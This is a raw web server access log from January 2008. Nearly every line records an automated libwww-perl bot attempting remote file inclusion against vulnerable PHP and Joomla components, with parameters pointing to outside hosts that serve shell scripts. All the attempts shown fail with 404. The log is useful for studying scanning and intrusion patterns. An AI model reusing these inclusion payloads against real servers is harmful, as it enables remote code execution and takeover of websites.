205.134.242.91 - - [20/Jan/2008:16:38:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.11.67.242 - - [20/Jan/2008:16:39:04 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:39:06 -0800] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:39:13 -0800] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.91.244.2 - - [20/Jan/2008:16:39:31 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.182.2 - - [20/Jan/2008:16:39:44 -0800] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.simplyellis.com/Scripts/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:40:37 -0800] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:40:47 -0800] "GET /logs/access_071210.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:40:48 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:40:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:40:49 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:41:07 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:41:07 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:41:20 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:41:26 -0800] "GET /logs/access_071014.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:41:35 -0800] "GET /logs/access_070820.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:41:36 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:41:39 -0800] "GET //spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.94.1.95 - - [20/Jan/2008:16:41:49 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [20/Jan/2008:16:41:49 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [20/Jan/2008:16:41:49 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:03 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:03 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [20/Jan/2008:16:42:12 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:13 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:13 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:15 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:42:30 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:42:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:43:05 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.62.196.11 - - [20/Jan/2008:16:43:16 -0800] "GET /logs/access_070826.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.62.196.11 - - [20/Jan/2008:16:43:19 -0800] "GET /logs/access_070723.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.79.216.105 - - [20/Jan/2008:16:43:27 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.216.105 - - [20/Jan/2008:16:43:27 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.216.105 - - [20/Jan/2008:16:43:38 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:44:37 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.126.66 - - [20/Jan/2008:16:45:13 -0800] "GET /logs/access_070820.log/rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.126.66 - - [20/Jan/2008:16:45:13 -0800] "GET /logs/rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:45:20 -0800] "GET /logs/access_070702.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:45:20 -0800] "GET /get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:45:20 -0800] "GET /logs/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.126.106 - - [20/Jan/2008:16:45:44 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.126.106 - - [20/Jan/2008:16:45:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:16:45:47 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.62.126.66 - - [20/Jan/2008:16:46:16 -0800] "GET /logs/access_070806.log/rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:16:46:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.63.172.153 - - [20/Jan/2008:16:47:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:38 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:38 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:38 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:39 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:40 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:40 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:41 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:41 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:47:41 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.91.98 - - [20/Jan/2008:16:49:07 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.78 - - [20/Jan/2008:16:49:19 -0800] "GET /logs/access_071210.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:49:25 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:49:25 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:49:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:50:08 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.33.2.131 - - [20/Jan/2008:16:50:52 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.33.2.131 - - [20/Jan/2008:16:50:53 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:50:54 -0800] "GET /logs/access_071210.log//spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:50:54 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:16:50:55 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:50:57 -0800] "GET /logs/access_071014.log//spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:50:58 -0800] "GET /logs/access_071014.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:51:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.126.106 - - [20/Jan/2008:16:51:04 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:51:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:40 -0800] "GET /logs/access_071014.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:41 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:41 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:55 -0800] "GET /logs/access_071014.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:55 -0800] "GET /logs/access_071014.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:56 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:56 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:56 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.38.90 - - [20/Jan/2008:16:51:56 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/roni_yulee/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:52:30 -0800] "GET /logs/access_071014.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.230.148.86 - - [20/Jan/2008:16:53:43 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [20/Jan/2008:16:53:44 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [20/Jan/2008:16:53:44 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:16:54:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.230.148.86 - - [20/Jan/2008:16:54:36 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.34.152 - - [20/Jan/2008:16:54:56 -0800] "GET /logs/access_071014.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:16:56:05 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.94.1.95 - - [20/Jan/2008:16:57:17 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.94.1.95 - - [20/Jan/2008:16:57:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:59:27 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:17:00:41 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.87.91.98 - - [20/Jan/2008:17:01:39 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.91.98 - - [20/Jan/2008:17:01:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
121.173.130.137 - - [20/Jan/2008:17:02:04 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.63.172.153 - - [20/Jan/2008:17:02:18 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.63.172.153 - - [20/Jan/2008:17:02:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:17:02:38 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:17:02:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.170 - - [20/Jan/2008:17:02:40 -0800] "GET /logs/access_071224.log/login.php?dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.197.170 - - [20/Jan/2008:17:02:40 -0800] "GET /login.php?dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.197.170 - - [20/Jan/2008:17:02:41 -0800] "GET /logs/login.php?dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.94.1.95 - - [20/Jan/2008:17:03:13 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:17:05:23 -0800] "GET //config.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:17:05:23 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:17:05:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.91.98 - - [20/Jan/2008:17:06:13 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:06:22 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:06:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
